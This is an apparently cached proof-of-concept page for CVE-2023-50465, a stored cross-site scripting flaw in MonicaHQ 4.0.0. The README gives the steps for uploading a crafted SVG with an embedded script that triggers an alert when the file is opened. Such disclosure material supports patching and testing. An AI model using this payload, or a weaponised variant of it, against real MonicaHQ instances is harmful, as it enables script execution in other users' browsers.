CVE-2023-50465 PoC — MonicaHQ 安全漏洞

Source

https://github.com/Ev3rR3d/CVE-2023-50465

Associated Vulnerability

Title:MonicaHQ 安全漏洞 (CVE-2023-50465)
Description:MonicaHQ是MonicaHQ公司的一个人际关系管理系统。 MonicaHQ 4.0.0版本存在安全漏洞。攻击者利用该漏洞可以上传包含跨站点脚本漏洞的 SVG 文档。

Readme

# MonicaHQ XSS

## Exploitation of MonicaHQ XSS

- Create an account

- Create a contact

- In Documents, upload a malicious SVG file

```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("Monicahq XSS Poc");
  </script>
</svg>

```
- Access the uploaded file

![image](https://github.com/Crypt0Cr33py/monicahqvuln/assets/108440914/71f6ec20-148b-4973-ac42-83ae7a5c0ae6)

File Snapshot


 [4.0K]  /data/pocs/60e7492b8f32795c2c32a045815a6dd8c7ff3c61
├── [8.9M]  monicahqpoc.zip
└── [ 659]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!